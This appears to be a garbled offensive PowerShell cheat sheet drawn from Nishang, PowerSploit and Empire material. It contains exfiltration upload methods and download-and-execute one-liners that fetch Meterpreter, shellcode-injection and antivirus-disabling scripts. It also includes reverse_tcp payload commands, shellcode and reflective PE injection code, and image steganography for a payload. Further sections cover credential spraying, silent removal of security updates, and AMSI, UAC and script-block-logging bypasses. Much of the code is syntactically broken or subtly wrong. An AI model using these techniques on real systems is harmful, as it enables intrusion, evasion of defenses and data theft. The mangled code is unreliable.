$stream = $response.GetResponseStream ()
$reader = New-Object System.IO.StreamReader($stream )
$reader.ReadToEnd () | Out-File " C:\path\to\file.exe" $reader.Close ()
$stream.Close ()
$response.Close ()Upload a file to the internet Invoke-WebRequest - Uri " http://example.com/upload" - Method Post - InFile " C:\path\to\file.exe" Upload a file using BITS (Background Intelligent Transfer Service) Start-BitsTransfer - Source " C:\path\to\file.exe" - Destination " http://example.com/upload" Upload a file using the System.Net.WebClient class $webclient = New-Object System.Net.WebClient
$webclient.UploadFile (" http://example.com/upload" , " POST" , " C:\path\to\file.exe" $webclient.Dispose ()Upload a file using the System.Net.HttpWebRequest class $request = [System.Net.HttpWebRequest ]::Create(" http://example.com/upload" $request.Method = " POST" $request.ContentType = " application/octet-stream" $request.ContentLength = (Get-Item " C:\path\to\file.exe" $stream = $request.GetRequestStream ()
$stream.Write ((Get-Content " C:\path\to\file.exe" - Encoding Byte), 0 , (Get-Content " C:\path\to\file.exe" - Encoding Byte).Length)
$stream.Close ()
$request.GetResponse ()Upload a file using the System.IO.File class $webclient = New-Object System.Net.WebClient
$webclient.UploadFile (" http://example.com/upload" , " POST" , " C:\path\to\file.exe" $webclient.Dispose ()
Upload a file using the System.IO.File class with a custom header
$webclient = New-Object System.Net.WebClient
$webclient.Headers.Add (" Authorization" , " Bearer YOUR_ACCESS_TOKEN" $webclient.UploadFile (" http://example.com/upload" , " POST" , " C:\path\to\file.exe" $webclient.Dispose ()Upload a file using the System.IO.File class with a custom header and a specific content type $webclient = New-Object System.Net.WebClient
$webclient.Headers.Add (" Authorization" , " Bearer YOUR_ACCESS_TOKEN" $webclient.Headers.Add (" Content-Type" , " application/octet-stream" $webclient.UploadFile (" http://example.com/upload" , " POST" , " C:\path\to\file.exe" $webclient.Dispose ()Upload a file using the System.IO.File class with a custom header, a specific content type, and a custom boundary $webclient = New-Object System.Net.WebClient
$webclient.Headers.Add (" Authorization" , " Bearer YOUR_ACCESS_TOKEN" $webclient.Headers.Add (" Content-Type" , " multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW" $webclient.UploadFile (" http://example.com/upload" , " POST" , " C:\path\to\file.exe" $webclient.Dispose ()Upload a file using the System.IO.File class with a custom header, a specific content type, and a custom boundary and a custom filename $webclient = New-Object System.Net.WebClient
$webclient.Headers.Add (" Authorization" , " Bearer YOUR_ACCESS_TOKEN" $webclient.Headers.Add (" Content-Type" , " multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW" $webclient.UploadFile (" http://example.com/upload" , " POST" , " C:\path\to\file.exe" , " custom_filename.exe" $webclient.Dispose ()Upload a file using the System.IO.File class with a custom header, a specific content type, and a custom boundary and a custom filename and a custom content disposition $webclient = New-Object System.Net.WebClient
$webclient.Headers.Add (" Authorization" , " Bearer YOUR_ACCESS_TOKEN" $webclient.Headers.Add (" Content-Type" , " multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW" $webclient.UploadFile (" http://example.com/upload" , " POST" , " C:\path\to\file.exe" , " custom_filename.exe" , " attachment; filename=custom_filename.exe" $webclient.Dispose ()Upload a file using the System.IO.File class with a custom header, a specific content type, and a custom boundary and a custom filename and a custom content disposition and a custom content transfer encoding $webclient = New-Object System.Net.WebClient
$webclient.Headers.Add (" Authorization" , " Bearer YOUR_ACCESS_TOKEN" $webclient.Headers.Add (" Content-Type" , " multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW" $webclient.UploadFile (" http://example.com/upload" , " POST" , " C:\path\to\file.exe" , " custom_filename.exe" , " attachment; filename=custom_filename.exe" , " base64" $webclient.Dispose ()[System.Text.Encoding ]::UTF8.GetString([System.Convert ]::FromBase64String(" SmVubnlMYWIK" [System.Convert ]::ToBase64String([System.Text.Encoding ]::UTF8.GetBytes(" JennyLab" Convert a string to a byte array [System.Text.Encoding ]::UTF8.GetBytes(" JennyLab" Convert a byte array to a string [System.Text.Encoding ]::UTF8.GetString([byte []]0x48 , 0x65 , 0x6c , 0x6c , 0x6f , 0x20 , 0x57 , 0x6f , 0x72 , 0x6c , 0x64 , 0x21 ) Convert a string to a byte array with a specific encoding [System.Text.Encoding ]::ASCII.GetBytes(" JennyLab" Convert a byte array to a hex string [System.BitConverter ]::ToString([byte []]0x48 , 0x65 , 0x6c , 0x6c , 0x6f , 0x20 , 0x57 , 0x6f , 0x72 , 0x6c , 0x64 , 0x21 ) Convert a hex string to a byte array [System.Convert ]::FromBase64String(" SmVubnlMYWIK" Convert a byte array to a GUID Convert a GUID to a byte array [System.Text.Encoding ]::UTF8.GetBytes([System.Guid ]::NewGuid()) Convert a byte array to a Base64 string [System.Convert ]::ToBase64String([System.Text.Encoding ]::UTF8.GetBytes(" JennyLab" Function for converting Base64 string to decoded file PS > Base64ToString base64.txt Base64ToString from string PS > Base64ToString dGVzdGVzdA== - IsString Base64ToString Code Function function Base64ToString
{
[CmdletBinding ()] Param (
[Parameter (Position = 0 , Mandatory = $True )]
[String ]
$Base64Strfile ,
[Parameter (Position = 1 , Mandatory = $False )]
[String ]
$outputfile = " .\base64decoded.txt" ,
[Switch ]
$IsString
)
if ($IsString -eq $true )
{
$base64string = [System.Convert ]::FromBase64String($Base64Strfile )
}
else
{
$base64string = [System.Convert ]::FromBase64String((Get-Content $Base64Strfile ))
}
$decodedstring = [System.Text.Encoding ]::Unicode.GetString($base64string )
$decodedstring
Out-File - InputObject $decodedstring - Encoding ascii - FilePath " $outputfile " Write-Output " Decoded data written to file $outputfile " http://labofapenetrationtester.blogspot.com/
https://github.com/samratashok/nishang
function Rot13
{
[CmdletBinding ()] Param (
[Parameter (Position = 0 , Mandatory = $True )]
[String ]
$String ,
[Parameter (Position = 1 , Mandatory = $False )]
[String ]
$outputfile = " .\rot13decoded.txt" ,
[Switch ]
$IsString
)
if ($IsString -eq $true )
{
$rot13string = $String | .\rot13.ps1
}
else
{
$rot13string = (Get-Content $String ) | .\rot13.ps1
}
Out-File - InputObject $rot13string - Encoding ascii - FilePath " $outputfile " Write-Output " Decoded data written to file $outputfile " function rot13 ($str ) {
$rot13 = @ ()
$str.ToCharArray () | % {
$c = $_
if ($c -cmatch ' [A-Z]' $c = [char ](([int ][char ]$c ) + 13 ) }
elseif ($c -cmatch ' [a-z]' $c = [char ](([int ][char ]$c ) + 13 ) }
elseif ($c -cmatch ' [A-M]' $c = [char ](([int ][char ]$c ) + 13 + 26 ) }
elseif ($c -cmatch ' [a-m]' $c = [char ](([int ][char ]$c ) + 13 + 26 ) }
$rot13 += $c
}
$rot13 -join ' ' Function rot13 (Rot13.ps1) function rot13 ($str ) {
$rot13 = @ ()
$str.ToCharArray () | % {
$c = $_
if ($c -cmatch ' [A-Z]' $c = [char ](([int ][char ]$c ) + 13 ) }
elseif ($c -cmatch ' [a-z]' $c = [char ](([int ][char ]$c ) + 13 ) }
elseif ($c -cmatch ' [A-M]' $c = [char ](([int ][char ]$c ) + 13 + 26 ) }
elseif ($c -cmatch ' [a-m]' $c = [char ](([int ][char ]$c ) + 13 + 26 ) }
$rot13 += $c
}
$rot13 -join ' ' ConvertTo-ROT13 Use example:
PS > ConvertTo-ROT13 - rot13string supersecret
PS > ConvertTo-ROT13 - rot13string fhcrefrperg ConvertTo-ROT13 Author:
http://learningpcs.blogspot.com/2012/06/powershell-v2-function-convertfrom.html
http://www.labofapenetrationtester.com/2016/11/exfiltration-of-user-credentials-using-wlan-ssid.html
https://github.com/samratashok/nishang
function ConvertTo-ROT13
{
[CmdletBinding ()] param (
[Parameter (Mandatory = $False )]
[String ]
$rot13string
)
[String ] $string = $null ;
$rot13string.ToCharArray () | ForEach-Object {
if ((([int ] $_ -ge 97 ) -and ([int ] $_ -le 109 )) -or (([int ] $_ -ge 65 ) -and ([int ] $_ -le 77 )))
{
$string += [char ] ([int ] $_ + 13 );
}
elseif ((([int ] $_ -ge 110 ) -and ([int ] $_ -le 122 )) -or (([int ] $_ -ge 78 ) -and ([int ] $_ -le 90 )))
{
$string += [char ] ([int ] $_ - 13 );
}
else
{
$string += $_
}
}
$string
}# Recommend// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Exfiltration/ Invoke-Meterpreter.ps1 );Invoke-Meterpreter - payload windows/ meterpreter/ reverse_tcp - lhost 192.168 .1.100 - lport 4444 Invoke-GenericPowershellTcp # Recommend// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Exfiltration/ Invoke-ReflectivePEInjection.ps1 );Invoke-ReflectivePEInjection - PEBytes $bytes - EntryPoint $entry - Show# Recommend// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Exfiltration/ Invoke-ReflectivePEInjection.ps1 );Invoke-ReflectivePEInjection - PEBytes $bytes - EntryPoint $entry - Show# Recommend// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Exfiltration/ Invoke-ReflectivePEInjection.ps1 );Invoke-ReflectivePEInjection - PEBytes $bytes - EntryPoint $entry - Show# Recommend// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Exfiltration/ Invoke-ReflectivePEInjection.ps1 );Invoke-ReflectivePEInjection - PEBytes $bytes - EntryPoint $entry - Show
IEX(New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/xorrior/RandomPS-Scripts/refs/heads/master/DisableCylance.ps1' Invoke-CylanceDisarm - ProcessID 4444 - DisableMemDef https://github.com/danielbohannon/Invoke-Obfuscation
# Recommend// raw.githubusercontent.com / peewpw/ Invoke-PSImage / master/ Invoke-PSImage.ps1 );Invoke-PSImage - ScriptBlock {powershell.exe - nop - w hidden - c " IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.1:8080/Invoke-Shellcode.ps1')" - Out C:\Windows\Temp\test.png - Image C:\Windows\Temp\test.jpgInvoke-ReflectivePEInjection # Recommend// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Exfiltration/ Invoke-ReflectivePEInjection.ps1 );Invoke-ReflectivePEInjection - PEBytes $bytes - EntryPoint $entry - ShowWindow Invoke-ReflectivePEInjection.ps1 function Invoke-ReflectivePEInjection {
param (
[Parameter (Mandatory = $true )]
[ValidateScript ({ $_.Length -gt 0 })]
[byte []]
$PEBytes ,
[Parameter (Mandatory = $true )]
[ValidateScript ({ $_.Length -gt 0 })]
[byte []]
$EntryPoint ,
[Switch ]
$ShowWindow
)
$ptr = [System.Runtime.InteropServices.Marshal ]::AllocHGlobal($PEBytes.Length )
[System.Runtime.InteropServices.Marshal ]::Copy($PEBytes , 0 , $ptr , $PEBytes.Length )
$kernel32 = [System.Runtime.InteropServices.Marshal ]::GetDelegateForFunctionPointer((Get-ProcAddress kernel32.dll LoadLibraryA), [System.Func [System.String , IntPtr ]])
$kernel32.Invoke (" kernel32.dll" $ntdll = [System.Runtime.InteropServices.Marshal ]::GetDelegateForFunctionPointer((Get-ProcAddress ntdll.dll RtlCreateUserThread), [System.Func [IntPtr , IntPtr , IntPtr , IntPtr , IntPtr , IntPtr , IntPtr ]])
$ntdll.Invoke ($ptr , 0 , 0 , 0 , 0 , 0 , 0 )
$kernel32 = [System.Runtime.InteropServices.Marshal ]::GetDelegateForFunctionPointer((Get-ProcAddress kernel32.dll VirtualAlloc), [System.Func [IntPtr , IntPtr , IntPtr , IntPtr , IntPtr ]])
$kernel32.Invoke ($ptr , $EntryPoint.Length , 0x3000 , 0x40 , 0x4 )
$kernel32 = [System.Runtime.InteropServices.Marshal ]::GetDelegateForFunctionPointer((Get-ProcAddress kernel32.dll RtlCopyMemory), [System.Func [IntPtr , IntPtr , IntPtr , IntPtr ]])
$kernel32.Invoke ($EntryPoint , $ptr , $EntryPoint.Length )
$kernel32 = [System.Runtime.InteropServices.Marshal ]::GetDelegateForFunctionPointer((Get-ProcAddress kernel32.dll CreateThread), [System.Func [IntPtr , IntPtr , IntPtr , IntPtr , IntPtr , IntPtr ]])
$kernel32.Invoke ($ptr , 0 , 0 , 0 , 0 , 0 )
}
# Recommend$PEBytes = [System.IO.File ]::ReadAllBytes(" C:\path\to\your\payload.dll" $EntryPoint = [System.IO.File ]::ReadAllBytes(" C:\path\to\your\payload.dll" $PEBytes = [System.Text.Encoding ]::UTF8.GetBytes($PEBytes )
$EntryPoint = [System.Text.Encoding ]::UTF8.GetBytes($EntryPoint )
$kernel32 = [System.Runtime.InteropServices.Marshal ]::GetDelegateForFunctionPointer((Get-ProcAddress kernel32.dll VirtualAlloc), [System.Func [IntPtr , IntPtr , IntPtr , IntPtr , IntPtr ]])
$ptr = $kernel32.Invoke (0 , $EntryPoint.Length , 0x3000 , 0x40 , 0x4 )
$kernel32 = [System.Runtime.InteropServices.Marshal ]::GetDelegateForFunctionPointer((Get-ProcAddress kernel32.dll RtlCopyMemory), [System.Func [IntPtr , IntPtr , IntPtr , IntPtr ]])
$kernel32.Invoke ($ptr , $EntryPoint , $EntryPoint.Length )
$kernel32 = [System.Runtime.InteropServices.Marshal ]::GetDelegateForFunctionPointer((Get-ProcAddress kernel32.dll CreateThread), [System.Func [IntPtr , IntPtr , IntPtr , IntPtr , IntPtr , IntPtr ]])
$kernel32.Invoke (0 , 0 , $ptr , 0 , 0 )Ivoke-Shellcode From Base64 $Shellcode = [System.Convert ]::FromBase64String(" base64 encoded shellcode" $Shellcode = [System.Text.Encoding ]::UTF8.GetBytes($Shellcode )
$kernel32 = [System.Runtime.InteropServices.Marshal ]::GetDelegateForFunctionPointer((Get-ProcAddress kernel32.dll VirtualAlloc), [System.Func [IntPtr , IntPtr , IntPtr , IntPtr , IntPtr ]])
$ptr = $kernel32.Invoke (0 , $Shellcode.Length , 0x3000 , 0x40 , 0x4 )
$kernel32 = [System.Runtime.InteropServices.Marshal ]::GetDelegateForFunctionPointer((Get-ProcAddress kernel32.dll RtlCopyMemory), [System.Func [IntPtr , IntPtr , IntPtr , IntPtr ]])
$kernel32.Invoke ($ptr , $Shellcode , $Shellcode.Length )
$kernel32 = [System.Runtime.InteropServices.Marshal ]::GetDelegateForFunctionPointer((Get-ProcAddress kernel32.dll CreateThread), [System.Func [IntPtr , IntPtr , IntPtr , IntPtr , IntPtr , IntPtr ]])
$kernel32.Invoke (0 , 0 , $ptr , 0 , 0 )Ivoke-Shellcode From File $Shellcode = [System.IO.File ]::ReadAllBytes(" C:\path\to\your\shellcode.bin" $Shellcode = [System.Text.Encoding ]::UTF8.GetBytes($Shellcode )
$kernel32 = [System.Runtime.InteropServices.Marshal ]::GetDelegateForFunctionPointer((Get-ProcAddress kernel32.dll VirtualAlloc), [System.Func [IntPtr , IntPtr , IntPtr , IntPtr , IntPtr ]])
$ptr = $kernel32.Invoke (0 , $Shellcode.Length , 0x3000 , 0x40 , 0x4 )
$kernel32 = [System.Runtime.InteropServices.Marshal ]::GetDelegateForFunctionPointer((Get-ProcAddress kernel32.dll RtlCopyMemory), [System.Func [IntPtr , IntPtr , IntPtr , IntPtr ]])
$kernel32.Invoke ($ptr , $Shellcode , $Shellcode.Length )
$kernel32 = [System.Runtime.InteropServices.Marshal ]::GetDelegateForFunctionPointer((Get-ProcAddress kernel32.dll CreateThread), [System.Func [IntPtr , IntPtr , IntPtr , IntPtr , IntPtr , IntPtr ]])
$kernel32.Invoke (0 , 0 , $ptr , 0 , 0 )Ivoke-Shellcode From String $Shellcode = [System.Convert ]::FromBase64String(" base64 encoded shellcode" $Shellcode = [System.Text.Encoding ]::UTF8.GetBytes($Shellcode )
$kernel32 = [System.Runtime.InteropServices.Marshal ]::GetDelegateForFunctionPointer((Get-ProcAddress kernel32.dll VirtualAlloc), [System.Func [IntPtr , IntPtr , IntPtr , IntPtr , IntPtr ]])
$ptr = $kernel32.Invoke (0 , $Shellcode.Length , 0x3000 , 0x40 , 0x4 )
$kernel32 = [System.Runtime.InteropServices.Marshal ]::GetDelegateForFunctionPointer((Get-ProcAddress kernel32.dll RtlCopyMemory), [System.Func [IntPtr , IntPtr , IntPtr , IntPtr ]])
$kernel32.Invoke ($ptr , $Shellcode , $Shellcode.Length )
$kernel32 = [System.Runtime.InteropServices.Marshal ]::GetDelegateForFunctionPointer((Get-ProcAddress kernel32.dll CreateThread), [System.Func [IntPtr , IntPtr , IntPtr , IntPtr , IntPtr , IntPtr ]])
$kernel32.Invoke (0 , 0 , $ptr , 0 , 0 )Ivoke-Shellcode InteropService Marshal function Invoke-Shellcode {
$shellcode = [System.Text.Encoding ]::UTF8.GetBytes(" Insert-ShellCode-Here" $ptr = [System.Runtime.InteropServices.Marshal ]::AllocHGlobal($shellcode.Length )
[System.Runtime.InteropServices.Marshal ]::Copy($shellcode , 0 , $ptr , $shellcode.Length )
}Invoke-Shellcode (PowerSploit) # Recommend// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ CodeExecution/ Invoke-Shellcode.ps1 );Invoke-Shellcode - Payload windows/ meterpreter/ reverse_tcp - Lhost 192.168 .1.100 - Lport 4444 - Force# Recommend$Image = [System.Drawing.Image ]::FromFile(" C:\path\to\your\image.png" $Bytes = [System.Text.Encoding ]::UTF8.GetBytes(" powershell.exe -nop -w hidden -c $ ( [System.Text.Encoding ]::UTF8.GetString([System.Convert ]::FromBase64String(' JABeA...' ) " $ImageBytes = [System.Drawing.Image ]::Clone()
$ImageBytes = $Image.PropertyItems [0 ].Value
$ImageBytes [0 .. ($Bytes.Length - 1 )] = $Bytes
$Image.PropertyItems [0 ].Value = $ImageBytes
$Image.Save (" C:\path\to\your\image.png" function Resolve-DCtoIP {
PROCESS {
Write-Output " [+] Enumerating all the DCs" ForEach ($dc in [DirectoryServices.ActiveDirectory.Domain ]::GetCurrentDomain().DomainControllers) {
Write-Output " [+] DC found: $ ( $dc.Name ) :$ ( $dc.IPAddress ) " Resolve-DCToIP - DomainName " domain.local" - DomainController " dc.domain.local" https:// raw.githubusercontent.com / BC- SECURITY/ Empire/ master/ data / module_source/ credentials/ Invoke-SessionControl.ps1 SYNOPSIS:
Nishang script which can be used to run netsh port forwarding/relaying commands on remote computers.
DESCRIPTION:
This script is a wrapper around the netsh Windows command's portproxy functionality. It could be used to create and remove
network relays between computers. The script is useful in scenarios when you want to access a port or service running on a
target computer which is accessible only through another computer(s) between you and the target computer. Another interesting
usecase is when you want to expose a local service to the network.
AUTHOR:
http://www.labofapenetrationtester.com/2015/04/pillage-the-village-powershell-version.html
https://github.com/samratashok/nishang
EXAMPLE
PS > Invoke-NetworkRelay - Relay v4tov4 - ListenAddress 192.168 .254.141 - Listenport 8888 - ConnectAddress 192.168 .1.22 - ConnectPort 445 - ComputerName 192.168 .254.141
PS > Invoke-NetworkRelay - Relay v6tov4 - ListenAddress :: - Listenport 8888 - ConnectAddress 192.168 .1.22 - ConnectPort 445 - ComputerName 192.168 .254.141
PS > Invoke-NetworkRelay - Relay v6tov6 - ListenAddress :: - Listenport 8888 - ConnectAddress fe80::19ed :c169:128c:b68d - ConnectPort 445 - ComputerName domainpc - Username bharat\domainuser - Password Password1234
PS > Invoke-NetworkRelay - Relay v4tov4 - ListenAddress 192.168 .254.141 - Listenport 8888 - ConnectAddress 192.168 .1.22 - ConnectPort 445 - ComputerName 192.168 .254.141 - Delete
PS > Invoke-NetworkRelay - ComputerName domainpc - Username bharat\domainuser - Password Password1234 - Show function Invoke-NetworkRelay
{
[CmdletBinding (DefaultParameterSetName = " AddOrDelete" Param (
[Parameter (Position = 0 , Mandatory = $False , ParameterSetName = " AddOrDelete" ValidateSet (" v4tov4" , " v6tov4" , " v4tov6" , " v6tov6" String ]
$Relay = " v4tov4" ,
[Parameter (Position = 1 , Mandatory = $False , ParameterSetName = " AddOrDelete" String ]
$ListenAddress = " 0.0.0.0" ,
[Parameter (Position = 2 , Mandatory = $False , ParameterSetName = " AddOrDelete" String ]
$ListenPort = 8888 ,
[Parameter (Position = 3 , Mandatory = $True , ParameterSetName = " AddOrDelete" String ]
$ConnectAddress ,
[Parameter (Position = 4 , Mandatory = $True , ParameterSetName = " AddOrDelete" String ]
$ConnectPort ,
[Parameter (Position = 5 , Mandatory = $False , ParameterSetName = " AddOrDelete" Parameter (Position = 0 , Mandatory = $False , ParameterSetName = " Show" String ]
$ComputerName ,
[Parameter (Position = 6 , Mandatory = $False , ParameterSetName = " AddOrDelete" Parameter (Position = 1 , Mandatory = $False , ParameterSetName = " Show" $UserName ,
[Parameter (Position = 7 , Mandatory = $False , ParameterSetName = " AddOrDelete" Parameter (Position = 2 , Mandatory = $False , ParameterSetName = " Show" $Password ,
[Parameter (Mandatory = $False , ParameterSetName = " AddOrDelete" Switch ]
$Delete ,
[Parameter (Mandatory = $False , ParameterSetName = " Show" Switch ]
$Show
)
# Check if Username and Password are providedif ($UserName -and $Password )
{
$SecurePassword = ConvertTo-SecureString $Password - AsPlainText - Force
$Creds = New-Object System.Management.Automation.PSCredential ($UserName , $SecurePassword )
}
else
{
$Creds = $False
}
if ($Show )
{
if ($Creds )
{
Invoke-Command - ScriptBlock {netsh interface portproxy show all} - ComputerName $ComputerName - Credential $Creds
}
else
{
Invoke-Command - ScriptBlock {netsh interface portproxy show all} - ComputerName $ComputerName
}
}
if (! $Delete -and ! $Show )
{
# Prepare relay commands$V4tov4Relay = " netsh interface portproxy add v4tov4 listenport=$ListenPort listenaddress=$ListenAddress connectport=$ConnectPort connectaddress=$ConnectAddress protocol=tcp" $V6toV4Relay = " netsh interface portproxy add v6tov4 listenport=$ListenPort listenaddress=$ListenAddress connectport=$ConnectPort connectaddress=$ConnectAddress " $V4tov6Relay = " netsh interface portproxy add v4tov6 listenport=$ListenPort listenaddress=$ListenAddress connectport=$ConnectPort connectaddress=$ConnectAddress " $V6toV6Relay = " netsh interface portproxy add v6tov6 listenport=$ListenPort listenaddress=$ListenAddress connectport=$ConnectPort connectaddress=$ConnectAddress protocol=tcp" # Create a scriptblock depending upon the type of relay.switch ($Relay )
{
" v4tov4" $sb = [ScriptBlock ]::Create($V4toV4Relay )
Write-Output " Initiating v4tov4 Relay. Listening on $ListenAddress , Port $ListenPort . Connecting to $Connectaddress , Port $Connectport " " v6tov4" $sb = [ScriptBlock ]::Create($V6toV4Relay )
Write-Output " Initiating v6tov4 Relay. Listening on $ListenAddress , Port $ListenPort . Connecting to $Connectaddress , Port $Connectport " " v4tov6" $sb = [ScriptBlock ]::Create($V4toV6Relay )
Write-Output " Initiating v4tov6 Relay. Listening on $ListenAddress , Port $ListenPort . Connecting to $Connectaddress , Port $Connectport " " v6tov6" $sb = [ScriptBlock ]::Create($V6toV6Relay )
Write-Output " Initiating v6tov6 Relay. Listening on $ListenAddress , Port $ListenPort . Connecting to $Connectaddress , Port $Connectport " # Execute the netsh command on remote computerif ($Creds )
{
Invoke-Command - ScriptBlock $sb - ComputerName $ComputerName - Credential $Creds
Invoke-Command - ScriptBlock {param ($SBRelay ) netsh interface portproxy show $SBRelay } - ArgumentList $Relay - ComputerName $ComputerName - Credential $Creds
}
else
{
Invoke-Command - ScriptBlock $sb - ComputerName $ComputerName
Invoke-Command - ScriptBlock {netsh interface portproxy show $Relay } - ComputerName $ComputerName
}
}
if ($Delete )
{
# Relay commands for deletion$V4tov4Relay = " netsh interface portproxy delete v4tov4 listenport=$ListenPort listenaddress=$ListenAddress protocol=tcp" $V6toV4Relay = " netsh interface portproxy delete v6tov4 listenport=$ListenPort listenaddress=$ListenAddress " $V4tov6Relay = " netsh interface portproxy delete v4tov6 listenport=$ListenPort listenaddress=$ListenAddress " $V6toV6Relay = " netsh interface portproxy delete v6tov6 listenport=$ListenPort listenaddress=$ListenAddress protocol=tcp" # Create a scriptblock for deleting the relay, depending upon its type.switch ($Relay )
{
" v4tov4" $sbdelete = [ScriptBlock ]::Create($V4toV4Relay )
Write-Output " Deleting v4tov4 Relay which was listening on $ListenAddress , Port $ListenPort and connecting to $Connectaddress , Port $Connectport " " v6tov4" $sbdelete = [ScriptBlock ]::Create($V6toV4Relay )
Write-Output " Deleting v6tov4 Relay which was listening on $ListenAddress , Port $ListenPort and connecting to $Connectaddress , Port $Connectport " " v4tov6" $sbdelete = [ScriptBlock ]::Create($V4toV6Relay )
Write-Output " Deleting v4tov6 Relay which was listening on $ListenAddress , Port $ListenPort and connecting to $Connectaddress , Port $Connectport " " v6tov6" $sbdelete = [ScriptBlock ]::Create($V6toV6Relay )
Write-Output " Deleting v6tov6 Relay which was listening on $ListenAddress , Port $ListenPort and connecting to $Connectaddress , Port $Connectport " # Execute the netsh command on remote computerif ($Creds )
{
Invoke-Command - ScriptBlock $sbdelete - ComputerName $ComputerName - Credential $Creds
Invoke-Command - ScriptBlock {param ($SBRelay ) netsh interface portproxy show $SBRelay } - ArgumentList $Relay - ComputerName $ComputerName - Credential $Creds
}
else
{
Invoke-Command - ScriptBlock $sbdelete - ComputerName $ComputerName
Invoke-Command - ScriptBlock {netsh interface portproxy show $Relay } - ComputerName $ComputerName
}
}
}SYNOPSIS:
Nishang script which can check for credentials on remote computers and can open PSSessions if the credentials work.
DESCRIPTION:
The payload uses WMI to check a credential against given list of computers. Use the -Creds parameter to specify username and password. If the script is run
from a powershell session with local or global admin credentials (or from a powershell session started with hashes of such account using WCE), it should be used
without the -Creds parameter. Use the -CreateSessions parameter to create PSSessions.
EXAMPLE:
PS > Create- MultipleSessions - filename .\servers.txt
PS > Create- MultipleSessions - filename .\servers.txt - Creds
PS > Create- MultipleSessions - filename .\servers.txt - CreateSessions AUTHOR:
http://labofapenetrationtester.blogspot.com/2013/04/poshing-the-hashes.html
https://github.com/samratashok/nishang
CODE:
function Create-MultipleSessions
{
[CmdletBinding ()] Param (
[Parameter (Position = 0 , Mandatory = $True )]
[String ]
$filename ,
[Parameter (Mandatory = $False )]
[Switch ]
$Creds ,
[Parameter (Mandatory = $False )]
[Switch ]
$CreateSessions ,
[Parameter (Mandatory = $False )]
[Switch ]
$VerboseErrors
)
$ErrorActionPreference = " SilentlyContinue" if ($VerboseErrors )
{
$ErrorActionPreference = " Continue" $servers = Get-Content $filename
if ($Creds )
{
$Credentials = Get-Credential
$CheckCommand = ' gwmi -query "Select IPAddress From Win32_NetworkAdapterConfiguration Where IPEnabled = True" -ComputerName $server -Credential $Credentials' $SessionCommand = ' New-PSSession -ComputerName $server -Credential $Credentials' else
{
$CheckCommand = ' gwmi -query "Select IPAddress From Win32_NetworkAdapterConfiguration Where IPEnabled = True" -ComputerName $server' $SessionCommand = ' New-PSSession -ComputerName $server' foreach ($server in $servers )
{
$check = Invoke-Expression $CheckCommand
if ($check -ne $null )
{
Write-Host " Credentials worked on $server !!" - ForegroundColor Green
if ($CreateSessions -eq $True )
{
" `n Creating Session for $server " Invoke-Expression $SessionCommand
}
}
else
{
" Could not connect or credentials didn't work on $server " if ($CreateSessions -eq $True )
{
Write-Host " `n Following Sessions have been created: " - ForegroundColor Green
Get-PSSession
}
}function Remove-Update
{
$UpdateID = Read-Host " Enter the UpdateID to remove" $Command = " Get-WmiObject -Class Win32_QuickFixEngineering | Where-Object {$_ .HotFixID -eq $UpdateID } | Remove-WmiObject" Invoke-Expression $Command
}SYNOPSIS:
Nishang Payload which silently removes updates for a target machine.
DESCRIPTION:
This payload removes updates from a target machine. This could be
used to remove all updates, all security updates or a particular update.
AUTHOR:
http://trevorsullivan.net/2011/05/31/powershell-removing-software-updates-from-windows/
https://github.com/samratashok/nishang
EXAMPLE:
PS > Remove-Update All
PS > Remove-Update Security
PS > Remove-Update KB2761226 CODE:
function Remove-Update {
[CmdletBinding ()] Param (
[Parameter (Position = 0 , Mandatory = $True )]
[String ]
$KBID
)
$HotFixes = Get-HotFix
foreach ($HotFix in $HotFixes )
{
if ($KBID -eq $HotFix.HotfixId )
{
$KBID = $HotFix.HotfixId.Replace (" KB" , " " $RemovalCommand = " wusa.exe /uninstall /kb:$KBID /quiet /norestart" Write-Host " Removing $KBID from the target." Invoke-Expression $RemovalCommand
break
}
if ($KBID -match " All" $KBNumber = $HotFix.HotfixId.Replace (" KB" , " " $RemovalCommand = " wusa.exe /uninstall /kb:$KBNumber /quiet /norestart" Write-Host " Removing update $KBNumber from the target." Invoke-Expression $RemovalCommand
}
if ($KBID -match " Security" if ($HotFix.Description -match " Security" $KBSecurity = $HotFix.HotfixId.Replace (" KB" , " " $RemovalCommand = " wusa.exe /uninstall /kb:$KBSecurity /quiet /norestart" Write-Host " Removing Security Update $KBSecurity from the target." Invoke-Expression $RemovalCommand
}
}
while (@ (Get-Process wusa - ErrorAction SilentlyContinue).Count -ne 0 )
{
Start-Sleep 3
Write-Host " Waiting for update removal to finish ..." # Usage$browser = New-Object System.Net.WebClient; $browser.Proxy.Credentials = [System.Net.CredentialCache ]::DefaultNetworkCredentials; iex($browser.downloadstring (" https://raw.githubusercontent.com/d0nkeys/redteam/master/code-execution/Invoke" + " -" + " Bypass.ps1" " $ ( Get-Command ' Invoke-Bypass-*-AMSI' ) " " $ ( Get-Command ' Invoke-Bypass-*-AMSI2' ) " " $ ( Get-Command ' Invoke-Bypass-*-ScriptBlockLog' ) " " $ ( Get-Command ' Invoke-Bypass-*-UACSilentCleanup' ) -Command cmd.exe" $id = random
iex @" function Invoke-Bypass-$id -ScriptBlockLog {
# cobbr's Script Block Logging bypass
`$ GPF=[ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings','N'+'onPublic,Static');
If(`$ GPF){
`$ GPC=`$ GPF.GetValue(`$ null);
If(`$ GPC['ScriptB'+'lockLogging']){
`$ GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;
`$ GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockInvocationLogging']=0
}
`$ val=[Collections.Generic.Dictionary[string,System.Object]]::new();
`$ val.Add('EnableScriptB'+'lockLogging',0);
`$ val.Add('EnableScriptB'+'lockInvocationLogging',0);
